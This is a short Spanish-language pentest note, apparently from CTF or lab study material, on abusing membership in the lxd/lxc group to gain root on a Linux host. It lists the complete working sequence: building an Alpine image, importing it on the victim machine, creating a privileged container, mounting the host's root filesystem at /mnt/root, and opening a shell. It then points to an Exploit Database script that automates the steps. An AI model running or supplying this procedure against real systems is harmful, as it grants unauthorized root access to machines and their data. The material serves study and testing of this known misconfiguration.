Abusando grupo lxd/lxc

Si tenemos el grupo lxd con nuestro usuario podemos desplegar contenedores (una máquina) para escalar privilegios como root, esto funciona de tal manera que podemos hacer que toda la raiz de el sistema operativo actual “/” (máquina principal) se monte en → /mnt/root (contenedor).

Entonces una vez creado tendríamos acceso como root a todos los archivos, carpetas de / que antes no podíamos leer/crear/modificar.

Descargar imagen que instalaremos

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Lo instalamos con sudo

sudo bash build-alpine

Todo este proceso en nuestra máquina, una vez tengamos la imagen .tar.gz la pasamos a la máquina victima.

Abusamos de lxd/lxc

1. lxc image import alpine-v3.18-x86_64-20230628_1137.tar.gz --alias alpine # importamos la imagen
2. lxc image list # listamos la imagen para ver que se haya creado
3. lxc init alpine privesc -c security.privileged=true 
4. lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true # ponemos que la / raiz este en /mnt/root
5. lxc start privesc
6. lxc exec privesc sh

Ahora solamente nos vamos a /mnt/root/ y tendremos todos los archivos y carpetas con permisos root

Ejemplo de /mnt/root

También hay este script que te automatiza todo este proceso:

Ubuntu 18.04 - 'lxd' Privilege EscalationExploit Database

Hecho por --> s4vitar & vowkin